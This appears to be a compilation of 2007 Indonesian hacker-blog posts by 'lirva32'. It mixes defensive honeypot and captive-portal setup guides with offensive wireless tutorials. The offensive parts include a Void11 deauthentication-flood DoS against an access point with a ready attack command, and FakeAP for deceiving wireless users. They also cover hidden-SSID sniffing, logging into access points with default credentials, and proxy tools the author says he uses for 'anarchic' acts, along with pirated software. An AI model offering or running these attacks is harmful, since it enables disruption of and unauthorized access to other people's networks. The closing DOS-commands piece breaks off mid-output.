* dan lain-lain



------| Anonymity


Beberapa istilah yang berkaitan dengan anonymous proxy:

* Anonymous - HTTP proxy server tidak mengirimkan variable HTTP_X_FORWARDED_FOR kepada remote host, hal diini dilakukan untuk menyembunyikan IP Address asli kita.

* High anonymity (elite proxy) - HTTP proxy server jenis ini tidak mengirimkan variable HTTP_X_FORWARDED_FOR, HTTP_VIA dan HTTP_PROXY_CONNECTION.

Apa yang membedakan anonymous proxy dan elite proxy adalah pengiriman variable HTTP_* oleh proxy server. Pada anonymous proxy, sangat dimungkinkan bagi remote host untuk mengetahui IP Address asli yang kita miliki dengan melihat variable HTTP_VIA dan HTTP_PROXY_CONNECTION.

Kalau Anda males cari2 anonymous proxy... ya sudah, lirva32 akan kasih tau beberapa tools yang memang cukup handal untuk membuat diri kita aman.
Tools2nya rata2 bayar sih...juga berbasis window$... tapi lirva32 akan mengangap.. dan selalu mengangap... kalo tools itu 'warez'.... Viva Wares... Happy Warez..., diantaranya :


- Steganos : Internet Anonym -
kalo tools yang ini gue sering pake banget ketika melakukan tindakan anarkis... gue ga usah pusing2
cari2 IP Proxy... bisa destroy tracing dan shredder lagi... keeyeeenn ddeehhh ;)



--------------------------------------------------------------------------------------------


- Hide IP Platinum -
lebih ringan.. lebih cepet.. banyak IP yang bisa digunakan untuk pemalsuan ;)




--------------------------------------------------------------------------------------------



- GhostSurf Platinum -
sama saja... biasa saja... tidak ada yang spesial... tapi tetap mumpuni...;)




--------------------------------------------------------------------------------------------


------|Appendix : Daftar Anonymous Proxy

Semoga bermanfaat.. maaf, kalo tulisan yang gue buat terlalu kiddies.. krn memang gue kiddies.... lol


.thx
lirva32


Shoutz :
. All echo|staff
. AllNewbieHacker,BekasiUnderGround
. MyDaughter : Faiza Debian Nafisa
. AllMyAssistant@BinaInsani





Last Updated ( Thursday, 23 August 2007 )

manual _Lirva32
Written by lirva32
Sunday, 08 July 2007
-- Melumpuhkan Access Point dengan Void11 --

Author : lirva32
Email : lirva32 [at] yahoo [dot] com


Wah, lirva32 mau ngajarin iseng2 nih... kali ini lirva mau melakukan DoS pada Access Point...
Jadi nanti AP akan dibanjiri dengan paket2 data... kalo udah banjir tuh AP bakalan ngedrop..
Gimna caranya...?? nanti dulu... lirva mau menjelaskan aplikasinya dulu....

Void11
Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets' sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan 'authentication packets (random client MACs)'

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)


Persiapan :
+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master

iwpriv wlan0 hostapd 1

./void11_hopper


alternatif void_hopper mode juga bisa meprgunakan :

iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving...biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :
void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35


wah... APnya ngedrop... restart..... he..he....
selamat menikmati... lirva tidak bertangung jawab atas tindakan destruktif apapun....


Referensi :
www.wirelessdefense.org

Shoutz :
. echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,anonymous
. Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
. My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,cyb3rtank,
cr4sh3r,,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas, #samarinda_hack, #aikmel, #renjana and AllNewbieHacker, komar@bms.
. Asistenku : MadeSipit,Aghe,Arie
. MyAlamamater : FTI-BudiLuhurUniversity



Last Updated ( Tuesday, 10 July 2007 )

Hidden SSID Sniffing
Written by lirva32
Tuesday, 22 May 2007

- Hidden SSID Sniffing -

uuuppsss.... kali ini lirva32 mau ngabahas bagaimana caranya mencuri SSID yang terhidden. Maksudnya terhidden disini artinya si Admin mematikan fungsi SSID broadcasting (SSID Broadcasting Disable).
Apa yang terjadi bila si Admin melakukan penghiddenan terhadap SSID... yang pasti SSID tidak akan terbaca oleh siapapun yang melakukan wardriving.
Nah, gimana caranya menangkap SSID yang broadcastingnya disable...??? salah satunya dengan memanfaatkan SSIDSniff. Mungkin tidak hanya dengan SSIDSniff saja kok... banyak apklikasi2 lain yang bisa digunakan... tapi kali ini saya mempergunakan aplikai yang bernama SSIDSniff karena lebih oke dan bagus dibandingkan dengan aplikasi lainnya.


SSIDSniff
SSIDSiff merupakan tools yang bisa membantu kita dalam melakukan penetrasi test terhadap jaringan wireless.
SSIDSniff bisa digunakan dibeberapa wireless card yang mendukung frame 802.11.
SSIDSniff mempergunakan header packet 802.11 yang mampu menampilkan jaringan wireless (AP) yang sedang aktif.
SSIDSniff dikembangkan dan dapat bekerja dengan baik pada system operasi Linux.


Keunggulan SSIDSniff :
- Mudah dipergunakan (-- menurut saya lohhh.... ;
- Mampu mengurutkan packet data dengan kriteria : packets per second, number of data packets, dll.
- Dapat menangkap data tertentu dari (banyak sumber data) dan dapat dibuatkan file yang kompatible dengan libpcap capture files.
- Memberikan sebuah pesan seperti pergerakan cursordari suatu isi packet data
- Notifikasi berupa Audio dari kegiatan Wireless
- cccaaapppeee dddeeehhhhh......


Hardware yang Compatible (tested) :
- Cisco PCM-340, PCM-350
- Intel ipw2100
- Belskin WiFi Card
- Atheros


Cara mempergunakan :
- donlod di : http://apt.sw.be/redhat/7.3/en/i386/dag/RPMS/ssidsniff-0.36-0.dag.rh73.i386.rpm
- Unpack & Compile
- Konfigurasi khan wireless card Anda utk dapat menerima packer data (raw frame) 802.11
Dokumentasi dapat Anda baca disini : google aza ya mas.... aku lupa alamatnya...caaapppeee ddeehhh...
- Start ssidsniff as root: shell# ./ssidsniff -i


Kendala yang mebatasi SSIDSniff :
- Signal quality/noise level : sangat menentukan sekali dalam proses Sniffing
- SSIDSniff belum mampu melaukan Channel hopping




Ditulis di kantor tanggal 4 April 2007
Jam 19.22 BBWI


Semoga bermanfaat....

.thx
lirva32



Fake AP -- Memdirikan Ribuan AP Palsu
Written by lirva32
Tuesday, 22 May 2007


- Fake AP -- Mendirikan Ribuan Access Point Palsu -





wah... lirva32 bikin tulisan lagi nih...
kali ini lirva32 mau ngebahas tentang bagaimana cara membuat Fake AP.
Fake AP menghasilkan ribuan access point palsu,
gunanya adalah dapat menipu pengakses jaringan wireless dan juga dapat membingungkan hasil pelacakan melalui aplikasi wardrivers, NetStumbler.


Persiapannya nih.... :
1. WiFi Card berbasis chipset Prism2/2.5/3
2. Download aplikasi Fake Ap dari : http://www.blackalchemy.to/project/fakeap/


Cara meramu Fake Ap nya begini :

1. Compile the Host AP driver dan bisa Anda ambil disini - http://hostap.epitest.fi
Anda juga membutuhkan CVS snapshot driver untuk meng 'enable ' fungsi
MAC switching.
2. Edit 'fakeap.pl' untuk mereflect settingan dan paths.
3. Run 'fakeap.pl' dengan user : root
4. Have fun... Wink yyeeeaaahhhh........

Usage: fakeap.pl --interface wlanX [--channel X] [--mac XX:XX...]
[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]
[--wep N] [--key KEY] [--power N]

--channel X ---> Use static channel X
--essid NAME ---> Use static ESSID NAME
--mac XX:XX... ---> Use static MAC address XX:...
--words FILE ---> Use FILE to create ESSIDs
--sleep N ---> Sleep N Ssec between changes, default 0.25
--vendor FILE ---> Use FILE to define vendor MAC prefixes
--wep N ---> Use WEP with probability N where 0 <> Use KEY as the WEP key. Passed raw to iwconfig
--power N ---> Vary Tx power between 1 and N. In milliwatts


.thx
lirva32

dedicated to : Anakku "Faiza Debian", All echo|staff,AllCrewLabBinaInsani,
MyAlmamater : FTI_UnivBudiLuhur,buat * yang baca tulisan ini.....
juga buat mereka yang telah memberikan banyak kontribusi utk kemajuan
bangsa ini........
Last Updated ( Tuesday, 22 May 2007 )


Captive Portal : WiFiDog
Written by lirva32
Tuesday, 22 May 2007

- CAPTIVE PORTAL : WiFiDog -


Baru2 ini saya menerapkan Captive Portal yang cukup lumayan bagus... bukan cuma bagus kok... proses pemasangannya yang sangat mudah.... sangat user friendly banget...
Memang sih banyak banget aplikasi2 Captive Portal : NoCat, NoCatSplah,SWHS, etc deh... tapi sangat saya sayangkan yang agak2 ribet dalam penyetingannya.....

WifiDog memiliki feature2 sbb :
# Captive portal which lets hotspot owners communicate with their users (custom content management).
--- pemilik captive portal dapat berkomunikasi dengan usernya.

# Wifidog gateway runs on GNU/Linux server and embedded device like the Linksys WRT54G with OpenWRT.

---- gatewaynya berbasis linux server dan bisa di embed pada AP linksys WRT54G

# Multi-language support: English, French, German and Portuguese.

---- support dengan multi bahasa.

# Maintain the connection by checking network activity instead of a javascript window. This allows PDAs and cellphones to connect.

--- memiliki fasilitas : checking aktifitas network, dan membolehkan koneksi melalui PDA dan selular.

# Users are unique and have a valid email address in order to open an account. Their privacy must be respected. You can also use a splash only page and do not ask user to create an account.

--- user yang memiliki email address uniq yang dapat membuka account.. user pun dapat membuat splash page.

# Users are able to create a working account directly from any hotspot. New users sign on from any hotspot, create their account and are granted access for 15 minutes to confirm an email. If they don't, they are disconnected.

--- user dapat bekerja dengan accountnya di beberapa hotspot.

# Hotspot monitoring by two way heartbeating, so the central server always knows which hotspots are up, regardles of dynamic DNS, firewalls, etc.

---- monitoring aktifitas yang terjadi pada hotspot


# Firewall has one rule to jump in, one to jump out when a connection is rejected, and one to jump out when a connection is accepted. The gateway must do its own NAT. All this allows wifidog to be integrated easily into an existing firewall configuration.

-- ada firewall

# Statistics : Cumulative bandwidth usage accounting (per connection, per user, per hotspot)

--- statistik koneksi yang lengkap

# Self-identification of the gateways ???

--- pengarahan gateway secara otomatis


untuk lengkapnya Anda bisa baca di : http://dev.wifidog.org/
Silahkan di implementasikan.. jika Ada pertanya dan masalah tentang setting dan konfigurasi silahkan Anda posting disini....


.thx
lirva32
Last Updated ( Tuesday, 22 May 2007 )


Part 8 : Hacking 'Default' AP
Written by lirva32
Tuesday, 22 May 2007


- Hacking 'Default' AP -



Adakalanya AP tidak diset oleh si Admin... bisa disebabkan karena Adminnya malas atau memang tidak memiliki pengetahuan tentang "How To Set AP"
Nah, kalo kondisinya seperti itu berarti kita bisa memanfaat proses "Default Gaining"... artinya kita coba memasukkan 'account + password default' bawaan pabriknya.
Gimana sih caranya.... cukup tau product AP dan seriesnya saja.... Nah, kalo ga tau gimana...??
ya coba cari tau dung.....
hhhhiikkss... kalo ditempat saya kerja... saya bisa ngitip dari jendela merek AP nya itu apa...
dan kalo saya scanning AP nya pake NetStumbler.. nama AP nya itu masih default "Linksys".... nah,
saya coba menebak password defaultnya... tapi masih salah terus... gimana biar tau password defaultnya...
hhhmmm... gampang aza....
. Akses Inet.. kalo ga ada ya ke warnet aza...
. url : http://www.cirt.net/cgi-bin/passwd.pl
. pilih menu : Search Default Password
. Masukkan Merk Product
. Jrengggg... jrenngggg.... dapet tuh password defaultnya....


.thx


lirva32

Last Updated ( Tuesday, 22 May 2007 )


Manual _Lirva32
Membangun Banyak Server Palsu Pada HoneyD .

[ 4 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com



Cieeee.. ketemu lagi nih.... ga bosen2 buka web lirva32 yah....?? atau sudah mulai menjemukkan...??? pengennya sih Kamu, Anda dan Kalian * tidak pernah bosan untuk mengunjungi web ini... hhhaaalllaaahhhhh, soalnya makin banyak yang mengunjungi situs ini itu artinya si pihak sponsor makin seneng dung... [mode : sambil lirik temen2 di rumahweb.com]. Hiikkk karena situs ini tidak akan pernah ada kalau tidak ada rumahweb.com, merekalah yang mensuport keberadaan situs ini... thx ya rumahweb.com...... [hhiikkss, nanti spacenya ditambahin lagi ga yah... biar bisa ngisi ebook..;)]
Btw, dari pertemuan honyed pertama sampe tulisan gue yang ketiga intinya hanya membahas bagaimana membuat konfigurasi untuk mendirikan 1 (only one) server palsu. Sebenarnya dengan beberapa trik saja kita bisa mendirikan banyak server palsu.
Kenapa harus mendirikan banyak server palsu..?? Jika kita bisa mendirikan banyak server palsu itu artinya semakin sempurnalah kita mencundangi si Attaker...bayangkan, pasti si Attacker makin bingung mempelajari keberadan system jaringan yang kita miliki... makin sulit untuk memetakan jaringan.. makin sulit untuk menebak target server sesungguhnya...iya ga..??? maka kemungkinan besar server asli kita tetap dalam kondisi aman... sekalipun harus tetap waspada.. waspadalah... (--hiikkss kayak pesen bang napi azah...).
Untuk percobaan kali ini, lirva32 akan mendirikan 4 (empat) server palsu, yaitu :
1. Windows 2000 Server
2. AIX
3. Windows 2003 Server
4. Windows NT Server

Bagaimana mendirikan banyak server palsu di honeyd :

Settingan 1 - Windows 2000 Server, simpan dengan nama file : config1.sample




Settingan 2 - AIX, simpan dengan nama file : config2.sample




Settingan 3 - Windows 2003 Server, simpan dengan nama file : config3.sample




Settingan 4 - Windows NT Server, simpan dengan nama file : config4.sample



Kini sudah ada 4 konfigurasi yang kita buat berati ada 4 server palsu yang akan kita buat... ;)
Nah, bagaimana agar 4 server palsu itu berjalan bersamaan...??? begini caranya :

1. Buat 1 (satu) batch file, misalkan saya memberi nama file tersebut dengan nama : eksekusi.bat
2. Isi file *.bat tersebut dengan script sbb :@echo off

cls
echo.
honeyd -d -f config1.sample -i 2 -l c:\Honeyd\log\honeyd1.log 192.168.10.0/24
honeyd -d -f config2.sample -i 2 -l c:\Honeyd\log\honeyd2.log 192.168.10.0/24
honeyd -d -f config3.sample -i 2 -l c:\Honeyd\log\honeyd3.log 192.168.10.0/24
honeyd -d -f config4.sample -i 2 -l c:\Honeyd\log\honeyd4.log 192.168.10.0/24
















3. Eksekusi *.bat tersebut, maka sekarang kita sudah memiliki banyak server ;)


Bagaimana di Linux...?? isi konfigurasinya sama seperti yang sudah saya paparkan diatas, hanya sedikit perbedaan saja kok... yaitu pada masalah eksekusinya, yaitu sbb :
1. Siapkan console : tty1, tty2, tty3 dan tty4
2. Eksekusi script dibawah ini pada masing2 tty :

tty1 :
# sudo ./honeyd -d -f config1.sample 192.168.10.0/24
tty2 :
# sudo ./honeyd -d -f config2.sample 192.168.0.10/24

tty3 :
# sudo ./honeyd -d -f config3.sample 192.168.0.10/24
tty4:
# sudo ./honeyd -d -f config4.sample 192.168.0.10/24


Akhirnya selesai sudah tulisan ke 4 (empat) ini.. kebetulan disamping gue lagi ada PushMove a.k.a Nita Wulandari... jadi gue mau ngobrol2 dulu sama die.. kan jauh2 datang musti diajak ngobrol.. jadi di stop dulu nih penulisannya.. nanti lanjut ke tulisan ke 5 (lima), ditunggu aja yah.... seee uuuuu...


.thx
lirva32



Last Updated ( Friday, 24 August 2007 )


Konfigurasi HoneyD[2]
Written by lirva32
Friday, 03 August 2007

. Konfigurasi HoneyD .

[ 3 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com


Lanjut mannngggg... ini adalah tulisan ketiga loh, setelah melewati beberapa tapak perjalanan Bekasi - Cilengsi akhirnya sampai rumah juga.. Alhamdulillah... malam ini mata gue masih belum juga ngantuk sehingga gue masih bisa melanjutkan proses pembuatan tulisan yang merujuk pada bagaimana kita melakukan konfigurasi terhadap Honeyd.
Pada tulisan sebelumnya gue sudah membahas beberapa script konfigurasi pemalsuan terhadap server yang akan menjadi obyek serangan para hacker dan para manusia yang mengaku dirinya hacker... he..he...

Masih ada berapa script yang bisa dihasilkan dari mekanisme konfigurasi honeyd, sebagai nutrisi tambahan ada script sbb :

Rubah isi config.sample dengan script di bawah ini untuk mendirikan Server 2003 + Exchange Server palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikan AIX palsu :



masih.. masih banyak sekali server2 palsu yang bisa dihasilkan oleh honeyd... btw, dari kemarin udah ngomongin Honeyd... cara pembuatan konfigurasinya.. and gue lupa banget nyampein sesuatu bahwa ketika honeyd didirikan memerlukan beberapa skrip pelengkap.. yaitu :exchange-imap.sh exchange-nntp.sh
exchange-pop3.sh exchange-smtp.sh
ftp.sh iis.sh
ldap.sh msftp.sh
pop3.sh smtp.sh
vnc.sh etc...



tenang... file2 tersebut bisa elo donload di : http://lirva32.org/download/

Okeh deh.. selamat malam untuk semuanya...selamat menikmati Honeyd... lol


.thx

lirva32


Last Updated ( Tuesday, 07 August 2007 )


Konfigurasi HoneyD
Written by lirva32
Thursday, 02 August 2007

. Konfigurasi HoneyD .

[ 2 of 5 tulisan ]
Author : lirva32 [at] yahoo [dot] com


waaahh.. ini tulisan gue yang kedua tentang Honeyd, jadi buat elo yang belum baca tulisan pertama diharuskan membacanya... biar ga jadi Jaka Sembung... he..he...
Kalo kita main Honeyd dan diimplementasikan sebagai honeypot itu artinya kita harus siap cape bin pegel untuk membuat konfigurasi server palsu yang kita inginkan, tapi jangan khawatir.. lirva32 akan bahas bagaimana membuat konfigurasinya, mungkin supaya elo tidak kehilangan jejak tentang cara membuat konfigurasinya maka gue akan menampilkan konsep pembuatan script server palsunya, di linux atau windows script konsepnya tetap sama, sbb:
membaca file konfigurasi, konfigurasi dibuat dengan :

config = creation | addition | binding | set | annotate | route [config]
creation= "create" template-name | "create" "default"
addition= "add" template-name proto "port" port-number action
binding = "bind" ip-address template-name |
"clone" template-name template-name
set = "set" template-name "default" proto "action" action |
"set" template-name "personality" personality-name |
"set" template-name "personality" "random"
"set" template-name "subsystem" cmd-string
"set" template-name "uptime" seconds
"set" template-name "droprate" "in" percent
"set" template-name "uid" number ["gid" number]
"set" ip-address "uptime" seconds
annotate= "annotate" personality-name [no] finscan |
"annotate" personality-name "fragment" ("drop" | "old" | "new")
route = "route" "entry" ipaddr |
"route" ipaddr "link" ipnetwork |
"route" ipaddr "add" "net" ipnetwork ipaddr ["latency" number"ms"] ["loss" percent]
proto = "tcp" | "udp" | "icmp"
action = "block" | "open" | "reset" | cmd-string | "proxy" ipaddr":"port























hhhiikkkksss betapa pusingnya kalo liat konsep script itu... iya ga...??? nah, biar ga pusing sebenarnya ketika kita melakukan instlasi honeyd maka honeyd sudah menyiapkan1 (satu) file konfigurasi yang nama filenya itu : config.sample.
Isi file : configuration.sample itu sepeti tampilan berikut ini :



Sekarang gini aja, lirva32 akan siapkan beberapa script yang siap pakai... nanti script yang ada pada file : configuration.sample isinya dibuang alias d i t i b a n dengan script yang udah lirva32 buat... lirva32 buat juga berdasarkan sample yang udah di oprak-oprek sana-sini.. sampe2 tuh script ledes kali karena kebanyakan di oprak-oprek.. ;)

Rubah isi config.sample dengan script di bawah ini untuk mendirikan Server 2000 palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikanWindows XP palsu :




Rubah isi config.sample dengan script di bawah ini untuk mendirikanWindows NT Server palsu :




Pengujian Script & Mengaktifkan Honeyd :

windows :


c:\honeyd\honeyd -d -f config.sample -i 2 -l c:\Honeyd\log\honeyd3.log 192.168.10.0/24

Linux :

# ./honeyd -d -f config.sample 192.168.10.0/24

or

# sudo ./honeyd -d -f config.sample 192.168.10.0/24

* keterangan : 192.168.10.0/24 merupakan IP yang dipantau trafic datanya

aaahhh.. lelah juga yah belajar Honeyd... tapi gpp namanya juga belajar... iya ga...???
btw, karena mahasiswa lirva sudah pada nunggu dikelas... jadi lirva32 mo ngajar dulu yah.. tulisan ini lirva tutup dulu... nanti nyambung pada tulisan yang ketiga yah..... semoga menjadi tulisan yang bermanfaat.


.thx
lirva32

greetz :
. Ibunda terkasih yang kasihnya mengairi ladangku dimusim kemarau sekalipun
semoga bunda yang sedang terbaring sakit... kembali sehat selalu... Thx Ya Rabb...
. AllEchoStaff, AllNewBieHacker
. Anakku : Faiza Debian Nafisa
. MyAssistantAllCrewLabBinaInsani
. MyAlmamater : FTI-Univ.BudiLuhur


Last Updated ( Tuesday, 07 August 2007 )
Read more...


HoneyD
Written by lirva32
Wednesday, 01 August 2007
. HONEYD .
-- honeypot dengan modul terlengkap --
[ 1 of 5 tulisan ]

Author : lirva32 [at] yahoo [dot] com

Alhamdulillah Ya Rabb...
Akhirnya gue bisa kembali nulis setelah 7 hari lamanya bersemedi ngurusin kerjaan kantor...
sambil ditemani lagu "Dirimu" dari Gank Pegangsaan gue membuat tulisan ini, kali ini lirva32 mau membahas salah satu honepot yang gue anggap paling bagus setelah Sebex, yaitu : Honeyd.
Honeyd gue katagorikan sebagai High Interaction Honepots, kenapa..?? karena memang tingkat aksi dan pemodelan yang diciptakan mampu dan sangat mampu untuk mengenali berbagai jenis serangan yang dilakukan oleh Attacker. Tidak hanya itu, banyak sekali dukugan modul yang sangat mumpuni untuk dijadikan teman sejatinya di honeyd. Heneyd dapat menciptakan virtual host berbabasis IP didalam jaringan Anda,virtual host tersebut sangat mirip dengan virual host aslinya loh...dapat mensimulasikan layanan TCP dan UDP yang dapat mengembalikan permintaan ICMP (ICMP request) dan yang sangat mengagumkan buat gue, honeyd menutup secara default UDP port dan honeyd akan memberikan jawaban untuk ICMP yang tidak dapat dicapai.
Honeyd ada versi Linux juga ada versi Windowsnya loh.. jadi buat elo yang biasa pake windows jangan berkecil hati.. masih bisa ditemani dengan honeyd.
Bagaimana mendirikan honeyd :

[+] donlod aza honeyd di : http://lirva32.org/download/

jika Anda melakukan perubahan terhadap source honeyd, Anda harus melakukan proses compile ssb :

1. siapkan library :
. libevent-win32(http://www.secuirtyprofiling.com)
. libdnet-msvc(http://www.secuirtyprofiling.com)
. winpcap Developer Pack(ttp://winpcap.polito.it/)
. Microsoft Platform SDK.

2. Ekstrak semua library tersebut kedalam sebuah folder, dengan hirarki sbb :
\direktori_anda
\libdnet-1.5
\libevent-0.6
\wpdpack
\honeyd-0.5

3. Buka file project honeyd (honeyd.dsw) dengan MS VC++ 6.
man... jangan di buka pake Visual .N[y]et yang man.... soalna ga support...

4. Pastikan juga MS. SDK Platform SDK sudah terinstall.
5. Lakukan prose compiler sehingga terbentuk honeyd.exe.

--- kalo ga ada perubahan, yo wis a usah melakukan compile2 lagi.. tinggal pake aza...


--- Yang pake windows :
[+] donlod juga WinPCAP, pada percobaan kali ini gue mempergunakan WinPCAP 3.0 (-- hiikkss.. ga tau versi terbarunya..)
[+] Install cygwin
[+] buat 1 (satu) folder pada dengan nama 'honeyd' pada drive C (-ingat.. honeydnya kagak pake tanda kutip...!!!)
[+] ekstrak file kompresinya pada folder tersebut.

Terus gimana dung kalo di Linux...?? pada saat tulisan ini gue buat, gue uji coba di OpenSuSe 10.1, dengan langkah :
[+] dependensi : libevent, libdnet, libpcap
[+] buat sebuah folder
[+] ekstrak source ke folder tersebut
[+] # ./configure
# make
# make install

Bagaimana menjalankan honeyd windows :

c:\direktori\honeyd

Pilihan parameter sbb :-d tidak mengerjakan proses daemon dan mengaktifkan debugging
-P untuk mendapatkan notifikasi pcap
-W daftar interface, cuma di win32 loh...
-l logfile membuat log file
-p fingerprints membaca hasil NMAPRead nmap fingerprints.
-x xprobe membaca xprobe fingerprints.
-a assoc membaca associates nmap fingerprints
-f file membaca file konfigurasi, konfigurasi dibuat dengan :

config = creation | addition | binding | set | annotate | route [config]
creation= "create" template-name | "create" "default"
addition= "add" template-name proto "port" port-number action
binding = "bind" ip-address template-name |
"clone" template-name template-name
set = "set" template-name "default" proto "action" action |
"set" template-name "personality" personality-name |
"set" template-name "personality" "random"
"set" template-name "subsystem" cmd-string
"set" template-name "uptime" seconds
"set" template-name "droprate" "in" percent
"set" template-name "uid" number ["gid" number]
"set" ip-address "uptime" seconds
annotate= "annotate" personality-name [no] finscan |
"annotate" personality-name "fragment" ("drop" | "old" | "new")
route = "route" "entry" ipaddr |
"route" ipaddr "link" ipnetwork |
"route" ipaddr "add" "net" ipnetwork ipaddr ["latency" number"ms"] ["loss" percent]
proto = "tcp" | "udp" | "icmp"
action = "block" | "open" | "reset" | cmd-string | "proxy" ipaddr":"port
-i interface interface yang dipergunakan
net IP address atau network (bisa dispesifikasikan utk notasi CIDR)




































karena gue pake SuSe : # ./honeyd

kalo yang pake sudo :

# sudo ./honeyd

Nah... sampe sini dulu yah.. tulisan ini sengaja saya buat berseri sampe 5 (l i m a) seri loh... soalnya memang panjang banget pembahasannya.
Mudah2an ga bingung.. kalo bingung silahkan hubungi gue aza lewat email... tetap semangat untuk belajar dung.. okeh...?? siippp kalo okeh...
sekarang lirva mau bobo dulu, karena sudah jam 11 malam... besok pagi harus bangun untuk pergi ke kantor...
btw, kalo Ada lowongan kerja lirva32 mauuu dung... karena memang sudah tidak betah dikantor ini.. soalnya gajinya pas2an... lirva juga kan mau punya uang banyak buat beli laptop... server... dan keperluan riset lainya deh... ayo tawarin lirva kerja dung...



.thx
lirva32


Greetz :
. Ibunda tercinta yang sedang terbaring sakit... smoga lekas sembuh demi anakmu yang masih seperti ini... ayo dong mi... cepet sembuh... aku kangen dengan senyum mami....
. AllEchoStaff, AllEchoMember
. Anakku "Faiza Debian Nafisa"
. MyOffice : thx for the laptop
. MyAlmamater UBL
. AllMyCrewLabBinaInsani..thx 4 ur dedication to me... ;)
Last Updated ( Thursday, 02 August 2007 )
Read more...


NFR BackOfficer
Written by lirva32
Friday, 20 July 2007

. Si Kecil Yang Cerdas .
[ BackOfficer Friendly ]




Kecil.. cerdas... ya BackOfficer Friendly lah...
Dia merupakan honeypot yang paling kecil ukurannya... tapi sangat mumpuni untuk dijadikan Honeypot berbasis windows. Tidak seperti Honeypot lainnya yang sangat sulit pada proses implementasi.
Seimbang dengan ukurannya yang kecil maka dia saya katagorikan sebagai 'low interaction honeypot'. Informasi tentang apa saja yang dilakukan Attacker tidak disimpan kedalam sebuah file log tetapi disampaikan langsung pada interface GUI monitoringnya.


Bagaimana mendirikan BackOfficer Friendly :
[-] Siapkan jaringan Anda

[-] Siapkan 1 (satu) server berbasis Windows, biarkan kondisi settingannya secara default (-- ga usah diupdate.. ga usah di path)
biarkan berlubang.. krn kalo hackernya cowo suka banget sama lubang.... uuppppssss porno ;)
Dalam uji coba kali ini saya mendirikan server berbasis 2000 Server yang tidak saya kasih service pack sedikitpun.. summmmppaahh...
jangankan karberos.. sp saja ga gue kasih kok...

[-] Donwload BOF di : http://lirva32.org/download/bof.zip

[-] Lakukan proses instalasi, hasil instalasi tidak menghasilkan 'shortcut' ambil saja di Program Files --> NFR --> ekskusi NFR

[-] Lihat di system tray ada logo NFR, aktifkan.




Nah, itu tampilan NFR BackOfficer monitoring... jadi semua tindakan yang dilakukan Attacker akan terlihat dibagian monitoring... ga usah cape2 mempelajari file log... cukup sederhanan kan...??

Bagaimana Mensettingnya ?
hhiikksss.. kan gue udah bilang.. ini Haoneypot termudah yang ga perlu banyak setingan.. tapi cukup mumpuni... ;)
Nih, lihat....




[*] Jika tanda checklist diaktifkan itu artinya NFR siap memantau services.




[*] Perhatikan pada tampilan tersebut diatas semua aktifitas yang dilakukan Attacker akan tercatat di monitoring.
Silahkan Anda lakukan penyerangan terhdapa server yang sudah Anda pasangi si kecil.. hhhmmm tindakan Attakingnya bisa ketauan... dan sangat mudah untuk mengenal teknik penyerangan yang dipergunakan...

Selamat menikmati si kecil nan cerdas... ;)



.thx
lirva32
Last Updated ( Friday, 20 July 2007 )



Hacking by dos
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah help untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik ping localhost maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

